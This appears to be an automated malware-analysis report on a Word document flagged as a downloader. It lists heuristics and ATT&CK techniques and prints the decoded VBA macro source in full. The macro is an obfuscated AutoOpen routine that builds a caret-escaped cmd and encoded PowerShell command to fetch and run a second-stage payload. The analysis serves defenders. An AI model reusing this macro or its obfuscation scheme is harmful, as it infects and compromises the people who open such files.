MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and the Shell() function, strongly suggesting the script attempts to download and execute a second-stage payload. The reconstructed command `md /V/C S^e^T^ ^ Q^y^i^6=^p^o^w^er^%he^l^l^ -e^ J^#^B^[^#/^E^#e^g^.#^Bp#G^U#^.^g^B^?`^%^#^J^#^Br` indicates the use of command shell to execute a PowerShell command, likely to fetch and run further malware.
Heuristics 10
-
ClamAV: Doc.Downloader.Generic-6665598-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6665598-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
On Error Resume Next CreateObject("WScript.Shell").Run! ChrW(1 + 3 + 8 + 9 + 46) + UOSVLtjFjkdrbZ + zQXKMuPDmBPw + jAXolAF + KJVtVWukFcf + ImjkiBkZ + ZSKiLOqwKsl + Elzojkj + CAwvdI + JdPEZiKhHGumjm + tUEwiEhQmZzO, 188069728 - 188069728 End Sub -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
On Error Resume Next CreateObject("WScript.Shell").Run! ChrW(1 + 3 + 8 + 9 + 46) + UOSVLtjFjkdrbZ + zQXKMuPDmBPw + jAXolAF + KJVtVWukFcf + ImjkiBkZ + ZSKiLOqwKsl + Elzojkj + CAwvdI + JdPEZiKhHGumjm + tUEwiEhQmZzO, 188069728 - 188069728 End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11076 bytes |
SHA-256: 04248cc6a59e092fadecbac818dac2b764f2333badb3018526f23c6a0d06d8ff |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
124 of 195 identifiers look randomly generated (e.g. 'JdPEZiKhHGumjm'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iCGjuRj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jcHcCcqU"
Function jAXolAF()
On Error Resume Next
VarType 89455 + mquJj / ibRzrz - 85918
HjdKE = 61734 - 99722
PcBtbrpk = "md " + "/V/C" + CStr(Chr(aMPAEGzVSJiP + upqRhiJSvaof + 34 + GzELlppWbYSiSG + flrZiTwwjG)) + "S^e" + "^T^ ^" + " ^ Q" + "y^i" + "^6^=^p^"
HjdKE = 66322 - HNGiUF - 92518 + wuPrDK
HjdKE = Log(QLQVHo)
IsArray 54951 / EOtLt
JOOIdvurc = "o^w^er" + "^%he^" + "l^l^" + " -e^ ^J" + "^#^B" + "^[" + "^#/^" + "E^#" + "^e^g^"
HjdKE = Sqr(490307260)
VarType Tan(RAJtfM)
IsArray Cos(90078994)
qkFzUNiJ = "#^9" + "^" + "#" + "^G4#ZQ" + "^B^" + "5^#C" + "?^" + "#.w^" + "B^i" + "#^" + "G^o^" + "#ZQ^Bj#" + "^H"
HjdKE = swtuPv - DlBuX
IsArray CDate(7)
PczktabYK = "Q^#" + "I#B" + "O#^G" + "^U#^d" + "#^#:#/" + "c^#" + "Z^Q" + "B^" + "i#EM#^"
VarType CBool(uNnTwP)
JadXKKWSiq = ".#^Bp#G" + "^U" + "#" + "^." + "g^B^" + "?#^" + "`^%^#^J" + "^#" + "^Br"
jAXolAF = PcBtbrpk + JOOIdvurc + qkFzUNiJ + PczktabYK + JadXKKWSiq
VarType ijmBj / 60313 + iHIYOX / ssvoqZ
End Function
Function KJVtVWukFcf()
On Error Resume Next
IsArray 23391 + CiQfJR
IsArray 11241 * MPBVU
VarType CStr(PKkwZI)
BQBWOB = "^#E8#Z" + "^#^#" + "^9#" + "Cc^#" + "^" + "a#^B" + "?#H" + "^Q#c" + "^#^#}^" + "#C"
VarType Tan(90)
IsArray CByte(2)
IsArray 99163 * QaVwnL - JMjdUl * oipuq
HjdKE = CByte(90462 / CbPUKj)
XrqUzEOAYcn = "^" + "8#" + "^Lw" + "B^?^#G" + "^U^#cwB" + "^?#`^" + "U#^" + "Lg" + "Bw^#" + "^G^U^#" + "d#^B" + "^"
IsArray Rnd(59265 - ilVhYj - 75702 + bUZvmt)
GBQqvOdbz = "l^#^H^I" + "#^d^" + "w^Bv" + "#" + "^G8^#Z" + "#^Bp#G" + "^" + "4" + "#Z^w^#"
HjdKE = Cos(2024)
HjdKE = Round(nLRdPc / zCALR)
HjdKE = 17372 * disZGi / 14801 * ECdAm
FRMczU = "^:^#" + "G" + "M^#.^w^" + "B'#C8^" + "#SgB" + "^z#E^4#" + "^MQB^Z^" + "#^" + "H" + "^U" + "#d" + "^Q#4^"
IsArray iwnJiq + CbkIah * KsGtQ / 61226
HjdKE = CCur(341707968)
HjdKE = Oct(71202 / 22511)
ijalBNf = "#" + "^E" + "^##a^" + "#B^?^" + "#HQ#" + "c" + "^##}^"
HjdKE = Hex(90717 / GSqTT * RSJmo / ihaCN)
idjuUwLuiS = "#C" + "8^" + "#^L^" + "wB^" + ":#^G^U#" + "dw^#^" + ":#^G" + "^g^#a^Q" + "^B^%#GE"
HjdKE = 46405 + 46326
HjdKE = WQzFA * rICSd
IsArray 68633 * SqIXR + mcMqc + 11946
IsArray Rnd(38392 * unKjJ)
IsArray CDec(wTvql)
VarType bTHHJi + uBKhns
UqwzowfTLwL = "^#cg^B^" + "p^#G^" + "8#dQ" + "^B^z" + "#C4^#" + "^YgB" + "l#C^" + "8#" + "c^Q^" + "BK#G^8#" + "c^w^" + "Br^#H" + "c^#^"
VarType Oct(NBaSsU)
VarType Cos(zmnuR)
VarType Sqr(LUZlD)
VarType Tan(cGwHb)
IsArray XhawXp - 34068 / 6151 - ddbWfQ
VarType Oct(EYEhTm)
FtBwBuzQfV = "Q^#^Bo^" + "#HQ^" + "#^d#B" + "^w" + "#^`^" + "o^#Lw^#" + "v^" + "#^G?^#Y" + "QBy#"
HjdKE = CCur(sDnfwC)
VarType 54269 * ObbVi
mZlGakhFv = "^GM" + "#aQBh^" + "#^Gw" + "^#ZwBh#" + "^HI#^" + "Y" + "wBp^#" + "G^E#^Lg"
VarType Val(nzmfzs - jUdAU + hpWSAc / wLwii)
HjdKE = cwiwTW / uAAQY
HjdKE = CDec(Puibb)
dXYXiYSwIF = "B^" + "j^#^G8#" + "^.Q#^:^" + "#^GI^#c" + "^g^"
VarType CDate(JjCXJr)
VarType 84591 * FRGSKV
HjdKE = CDate(FtsRl)
IsArray 6058 - BBiJl + CYbwEr * VjGSBK
IsArray CDate(DjzAu / vSsrJK)
tzzDKdb = "#v#" + "EM^#_" + "^#^Bm^" + "#/^E^#^" + ".^g^B"
VarType SHmvIm / zrdUsw * wQaON / szzZIn
VarType TnDmr + hnozJ / 12224 - JSUXEH
tZslsokKrl = "##Gg#^" + "d#B" + "^?" + "#H#^#" + "Og^#" + "v^#C^8#" + "d^wB5#" + "Hc" + "^" + "#L^g^B" + "'#^H^" + "U" + "^#^aw"
HjdKE = CDate(kGDQw + 35174)
VarType 54714 * DfMAR + wjbNP + bMouRc
VarType nULhj / ZhAnW + caEHb * 67169
btBzDtWj = "B?#G^8" + "^#^LgB^" + "y^#" + "^HU" + "#c^#^B" + "v^#G^%#"
KJVtVWukFcf = BQBWOB + XrqUzEOAYcn + GBQqvOdbz + FRMczU + ijalBNf + idjuUwLuiS + UqwzowfTLwL + FtBwBuzQfV + mZlGakhFv + dXYXiYSwIF + tzzDKdb + tZslsokKrl + btBzDtWj
HjdKE = Sin(EUqBZK)
End Function
Function ImjkiBkZ()
On Error Resume Next
HjdKE = Hex(2)
HjdKE = Rnd(8832)
HjdKE = lhKjp + 97834
fzmnaJYvJ = "L^gB^:" + "#^G^U^" + "#d^#" + "^#v#" + "/^M^" + "#Q#Bo" + "^#HQ#" + "d^#^B" + "^w^#" + "^`^o#" + "^" + "L^w#v#^" + "H^o^"
VarType Val(zZZGjB)
HjdKE = 99754 - vQdzvl * OTriu - UYwmii
HjdKE = CVar(MJGSj / 24527 * LVzstu - 77227)
dYKIfYC = "#Y^Q" + "Bp#" + "G4#" + "^YQ^B" + "^i#" + "^H^M#" + "^a^" + "Q^B^" + "w" + "#H^I" + "^#YQ#^:" + "^#G^I^#"
VarType Atn(353827860)
RFEHGiZ = "^.^" + "#" + "^B" + "v^" + "#" + "^Gc#^Lw" + "^Bw^#GY" + "#cgB^[^" + "#E8^#J" + "w" + "#:^#/^M" + "^#c" + "#^B^%#G"
HjdKE = Month(411291583)
HjdKE = Rnd(5)
VarType Val(chWHiJ)
MrwvPK = ",#^d^#" + "#^o#Cc#" + "Q^##n#" + "C," + "^#" + "Ow#^" + ",^#^Ec^" + "#^SwBH"
IsArray Round(kkPRYs)
kPSaKGKrctP = "^" + "#C^##" + "[^" + "Q#g" + "^#C" + "c" + "#N^##" + "^y#^" + "`,^#"
VarType 87503 / UBwcnc - dvjkko + cwGqf
IsArray Rnd(fhQrR)
VarType 84771 - IjnLX * FPPnc - MrCCK
HjdKE = VQliU * HFHsLu / 36289 / WSDrGl
KjjiSDp = "J^w^#7" + "#C" + "Q^#c" + "^gB?^" + "#" + "^GY^#" + "[^Q" + "^#^," + "^#^G" + "U#^.g" + "B" + "^"
IsArray Cos(1767)
VarType TypeName(ovKdN)
VarType CDbl(WUdSkO)
zImbOtUvTza = "2#`^o^" + "#c^" + "#B^1" + "^" + "#GI^#" + ".^#^B" + "^p#^GM" + "^#K^"
HjdKE = LCase(WTMBSJ / ImDJP - VQOiw - ttOvS)
IsArray Month(lQNGWa - QdFUkb)
HjdKE = Cos(251)
uBwqwYiUz = "w^#" + "n^#/w^" + "#" + "^" + "J"
VarType Hex(BRsfV)
HjdKE = CVar(hXHvJt)
icJjIOY = "^w" + "^#r^" + "#" + "C^Q^#R^" + "w^B^L" + "#Ec^#^K" + "w#n" + "^#C^" + "4#Z"
VarType GNZwM * EVYln
IsArray 6101 + KivMr - naSqIX + fzwjaP
IsArray KmSXq / TUrCnu
UidjZ = "QB^" + "4^#GU" + "^#Jw#7" + "#G" + "Y^#.w" + "^B^" + "y#^" + "GU#YQB" + "j#Gg#K"
HjdKE = CDbl(VfoUL)
HjdKE = Round(pjLHzE)
HjdKE = Atn(6759)
IsArray Str(NicjF)
sFhBoRG = "^##,^#" + "/^,#^Z" + "gB^Q#C" + "^#^" + "#a" + "QB^:#C" + "#^#" + "^J#^B"
ImjkiBkZ = fzmnaJYvJ + dYKIfYC + RFEHGiZ + MrwvPK + kPSaKGKrctP + KjjiSDp + zImbOtUvTza + uBwqwYiUz + icJjIOY + UidjZ + sFhBoRG
IsArray Oct(3)
VarType 65365 * uPKlEF - JmjEbk / GQwJM
End Function
Function ZSKiLOqwKsl()
On Error Resume Next
HjdKE = Atn(dfDoKk)
IsArray Oct(820)
IsArray Str(94732 * ROSQjE)
ZErjONNzN = "r#E8" + "^#Z^##" + "p#^H^%#" + "d#" + "^B^y#H^" + ",#" + "e^w#" + ",^#^E" + "^8#^UQ" + "^" + "B^}" + "^#C4"
IsArray 1893 / SKAuvj + 27780 / izYdri
HjdKE = 25055 * qmLZi + 5564 * zEERG
jijnsZIoG = "^#R^#B" + "v^#^Hc" + "^#.g^B" + "^%^#" + "^G^8" + "#^YQB,#" + "E^Y^#^" + "a^" + "QB^%" + "#GU#^K#" + "^#,#" + "/" + ",^#^"
VarType Val(9134)
VarType 74595 * KzmwX
IsArray Round(1)
FriYjjlcfZ = "Z^g^BQ^" + "#C" + "w^" + "#^" + "I##^,^#" + "^H" + "I^"
VarType CDbl(jYAoZ)
IsArray CDate(QSmpAk + swqbw + WzlZhh - QwWAIk)
kslMTwijjJQ = "#^d^#" + "B" + "m^#" + "C^,^" + "#^O^" + "w"
IsArray CBool(63865 / YlIzZ / BjaRkM * UBLWt)
IsArray CVar(iMozW)
HjdKE = Rnd(zQfuIv)
HjdKE = NJMiE - dKFBzh / 74963 - HrqhTv
NjYZKIBbWip = "^BJ^" + "#^G4" + "^#^" + "d^gBv" + "#G^%#ZQ" + "#'" + "^" + "#E" + "," + "^"
VarType Val(aclOj - otwaDN)
CzHakr = "#" + "^d^" + "#^B^l#^" + "G^?" + "#I^##^," + "#" + "^" + "H^I^#"
HjdKE = QCOjX / WzCudh
HjdKE = LdQIzF / fWfifI / vqczN - YvHaQO
bmSNKViO = "^d" + "#^B^m#^" + "`^%^#" + "^Y^g^B^" + "y" + "^#"
VarType UCLdwl * mFFPak + 61338 + 66824
YwHzzovJWD = "^G^U" + "#^YQ^Br" + "^#`^%#^" + "f" + "Q^Bj^#G" + "^E#^d#" + "^B^" + "j#" + "G" + "g^#" + "e^w^" + "B^9"
HjdKE = Sin(HCMSdT * XPVqr)
IsArray Atn(TwCdT)
YikCquN = "#H^?#^" + "I#^#^g^" + "#" + "C^#" + "^" + "#^" + "I##g#C^" + "#"
IsArray TypeName(3)
HjdKE = LCase(DXuwNo)
wnsvrG = "^#" + "I##^g#" + "C##^I##" + "g#C^#^#" + "^I^" + "##^g" + "^#C#^#I" + "##g#^#" + "==" + "& " + "S^e^"
VarType CBool(YjwcX)
rolFrIcvwwK = "t ^ ^" + " ^" + "m^" + "a" + "^i=^!^Q" + "^y" + "i^6:^`=" + "D^" + "!&S" + "^e^T " + " ^ ^Y^"
ZSKiLOqwKsl = ZErjONNzN + jijnsZIoG + FriYjjlcfZ + kslMTwijjJQ + NjYZKIBbWip + CzHakr + bmSNKViO + YwHzzovJWD + YikCquN + wnsvrG + rolFrIcvwwK
VarType CStr(15)
HjdKE = Round(FYVcwN)
HjdKE = Oct(GodFk)
End Function
Function Elzojkj()
On Error Resume Next
VarType 48373 / EbwmH
IsArray CStr(IujVK)
VarType Oct(wUSDE)
rnKMF = "o9=" + "^!^m" + "^a^i^:" + "/^=^" + "F^"
IsArray Int(fbvRJ)
HjdKE = Hex(YjGzl)
VarType CVar(71594 * JRXOHp + 43103 / 89640)
hibJd = "!&" + "& S^" + "Et ^ ^" + " ^Mg9^" + "i=^" + "!" + "^Y^o^9^" + ":" + "'^=^t" + "!&& s^" + "E" + "^T ^ "
IsArray Round(57018 + JsjXj)
tNwRnWprBsG = "^0^H" + "Y=^!^M" + "^g^9^" + "i" + "^:^" + "[=^P!& " + " S^e" + "t ^ ^ " + "^K^m=" + "!^0^HY" + "^"
HjdKE = 19838 / EjPcjj - mULtOF / wmpfO
wvdktS = ":" + "%=" + "s^!& " + "S^eT" + " ^ " + " ^ X"
HjdKE = 74252 - CiDwjX / YBnKvp * bZcHzs
VarType CDec(4798)
HjdKE = kHScra + oMVfkq + FDsLY + vEkmD
IsArray Sqr(74714 * tWXDLN * HKHrTs / wXjUMq)
CsvcldcW = "^h=!" + "^K^" + "m" + ":#^=^A" + "!&" + " S^E^" + "t " + "^ ^" + " ^ qo" + "^"
VarType 59402 / FMCjd
IsArray Round(443)
mKBwQVzTKM = "J^a=^" + "!^X^" + "h^" + ":^.^" + "=b!&& S"
HjdKE = Rnd(1)
IsArray CStr(8)
HjdKE = TimeValue(jtAidY)
IsArray 40354 / IRSki - 67037 + jhkJZH
ZljjstFMz = "^e" + "T" + " ^ ^ " + "^7^8" + "F" + "=^!^q^" + "o^J^a^:" + "}^=6^" + "!&SE^t " + " ^ ^" + " ^1^k"
IsArray doXrG + 77616
stDOYWED = "^gx" + "=^!^" + "7^8F:?" + "^=0^!" + "&& s" + "^e^T" + " ^ ^" + "mq=^!" + "^" + "1^k^g" + "^x^:^,^" + "=^k^!&&"
VarType Rnd(RLoNO + dYwiw + 75398 / ouMUMk)
IsArray Log(jkraBu - obwEw)
tjUYUNlLPz = "s^" + "E^" + "T ^" + " ^ ^ ^" + "x^WV" + "=!^mq^:" + "^5" + "=^3^" + "!&& " + " "
Elzojkj = rnKMF + hibJd + tNwRnWprBsG + wvdktS + CsvcldcW + mKBwQVzTKM + ZljjstFMz + stDOYWED + tjUYUNlLPz
HjdKE = CDate(uVfzE)
End Function
Function CAwvdI()
On Error Resume Next
VarType Sgn(iXiAc)
VarType 72533 + UqQhaz * 75721 - 24370
FYYcuEm = "se" + "^t ^ Q" + "^" + "F^" + "4=!^x^W" + "V^:^" + ":^=^u" + "!&& " + " s^ET " + "^"
VarType Hex(VirquK)
VarType CDate(69163 - kwwwi - 36497 - tUGTnj)
HjdKE = CDec(79378 - MmuhH + ZskktO - ZfNHk)
IsArray CByte(34990 + 97914 * mimIiM + TuqKp)
DEznAYUkwM = " ^" + " Y^h^" + "Wq" + "=!Q^F^" + "4^:^" + "_^" + "=T^!&" + " " + " C^a^L^" + "L %Y^" + "h^W" + "q% "
VarType VQOzp / COZWf
iqDSdsvA = " " + CStr(Chr(RpMYpzOS + iKvYORwDM + 34 + auDorRnBFc + hFlMuoSrc)) + " " + ""
CAwvdI = FYYcuEm + DEznAYUkwM + iqDSdsvA
HjdKE = DaBwGW * MzZaY
HjdKE = Second(69617 * MXdLO - Jlbcn - 10846)
HjdKE = rUJSo + QVbJt
HjdKE = 51516 - fwiah * 83018 + 42705
End Function
Attribute VB_Name = "ZvqYdDFdD"
Sub AutoOpen()
On Error Resume Next
CreateObject("WScript.Shell").Run! ChrW(1 + 3 + 8 + 9 + 46) + UOSVLtjFjkdrbZ + zQXKMuPDmBPw + jAXolAF + KJVtVWukFcf + ImjkiBkZ + ZSKiLOqwKsl + Elzojkj + CAwvdI + JdPEZiKhHGumjm + tUEwiEhQmZzO, 188069728 - 188069728
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.